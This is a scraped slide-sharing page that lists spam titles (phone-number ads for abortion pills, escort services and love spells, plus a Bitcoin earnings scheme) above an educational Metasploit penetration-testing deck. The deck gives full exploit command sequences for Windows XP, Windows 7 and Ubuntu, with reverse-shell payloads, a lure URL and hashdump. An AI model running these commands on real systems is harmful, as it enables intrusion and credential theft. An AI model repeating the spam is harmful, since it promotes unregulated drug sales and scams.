%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
WSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go PlatformlessWSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go Platformless
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
Architecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the pastArchitecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the past
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With SimplicityWSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 

Pen-Testing with Metasploit

  • 1. Pen-Testing With MetasploitBy -Mohammed Danish Amber
  • 2. AGENDA ▪ Why & What's Pen-Testing ▪ About Metasploit ▪ Metasploit Basic & Meterpreter ▪ Demo
  • 3. Mohammed Danish Amber ▪ Geek & Security Analyst ▪ Information Security Enthusiast ▪ Working in TCS ▪ Lecturer & Engineer ▪ Collaborative Project -Hacker Ecosystem ▪ Make Internet a Secure Place
  • 4. Why Pen-Testing ▪ Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches ▪ Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs
  • 5. What's Pen-Testing ▪ A method to evaluate the security of computer system / network ▪ Practice ( attacking ) an IT System like a ‘hacker’ does– Find security holes (weaknesses) – Bypass security mechanism– Compromise an organization’s IT system securityMUST HAVE PERMISSION FROM IT SYSTEM OWNERILLEGAL ACTIVITY CAN PUT YOU IN JAIL!
  • 6. ETHICS ▪ THINK BEFORE YOU ACT ▪ DON'T BE STUPID ▪ DON'T BE MALICIOUS
  • 7. PEN-TESTING PHASES INFORMATION GATHERING VULNERABILITY ANALYSIS EXPLOITATION POST EXPLOITATION REPORTING
  • 8.
  • 9. Metasploit ▪ Not Just A Tool but an entire framework ▪ An Open Source platform for writing security tools and exploits ▪ Easily build attack vectors to add it's exploits, payloads, encoders. ▪ Create and execute more advanced attack ▪ Ruby based
  • 10. Metsaploit Interface ▪ MSFconsole ▪ msfweb, msfgui (discontinued) ▪ Metasploit Pro & Community Edition ▪ Armitage
  • 13. Metasploit Terminology ▪ Exploit: Code that allow a pentester take some advantages of flaw within system,application, or service ▪ Payload: Code that we want the target system to execute (few commands to be executed on the target system) ▪ Shellcode: A set of instructions used as payload when exploitation occurs ▪ Module: A software that can be use by metasploit ▪ Listener: A component waiting for incoming connection
  • 14. How does Exploitation works Attacker Sends: Exploit + PayloadUpload + download DATA Vulnerable Server Exploit run + Payload run
  • 15. Meterpreter ▪ As a payload after vulnerability is exploited ▪ Improve the post exploitation
  • 16. Meterpreter Exploiting a vulnerability Select a meterpreter as a payload Meterpreter shell
  • 22. Windows XP Exploitation ▪ msf > search windows/smb ▪ msf > info exploit/windows/smb/ms08_067_ netapi ▪ msf > use exploit/windows/smb/ms08_067_ netapi ▪ msf exploit(ms08_067_netapi) > show payloads ▪ msf exploit(ms08_067_netapi) > set PAYLOAD ▪ windows/meterpreter/reverse_tcp ▪ msf exploit(ms08_067_netapi) > show options ▪ msf exploit(ms08_067_netapi) > set RHOST <remote ip> ▪ msf exploit(ms08_067_netapi) > set LHOST <attacker ip> ▪ msf exploit(ms08_067_netapi) > show options ▪ msf exploit(ms08_067_netapi) > exploit ▪ meterpreter > background ▪ session -l
  • 23. Windows XP Exploitation ▪ session -i 1 ▪ meterpreter > getsystem -h ▪ getuid ▪ hashdump
  • 24. Windows 7 Exploitation ▪ msf > use exploit/windows/browser/ms11_003_ie_css_import ▪ msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp ▪ msf exploit(ms11_003_ie_css_import) > show options ▪ msf exploit(ms11_003_ie_css_import) > set SRVHOST <victim ip> ▪ msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 ▪ msf exploit(ms11_003_ie_css_import) > set URIPATH free_iphone6plus.exe ▪ msf exploit(ms11_003_ie_css_import) > set LHOST <victim ip> ▪ msf exploit(ms11_003_ie_css_import) > set LPORT 443 ▪ msf exploit(ms11_003_ie_css_import) > exploitJust wait until the victim open url http://<ip>:80/free_iphon6plus.exe
  • 25. Windows 7 Exploitation ▪ msf exploit(ms11_003_ie_css_import) > sessions -l ▪ msf exploit(ms11_003_ie_css_import) > sessions -i 1 ▪ meterpreter > sysinfo ▪ meterpreter > shell
  • 26. Ubuntu Exploitation ▪ search distcc ▪ use exploit/unix/misc/distcc_exec ▪ show payloads ▪ set PAYLOAD cmd/unix/reverse ▪ show options ▪ set rhost <victim ip> ▪ set lhost <attacker ip>
  • 28. Thanks To ▪ Kali / BackTrack Linux ▪ Metasploit Team (HD Moore & rapid7) ▪ Offensive Security / Metasploit Unleashed ▪ David Kennedy ▪ Georgia Weidman ▪ Null Hyderabad Chapter -CORE TEAM ▪ #nullhyd @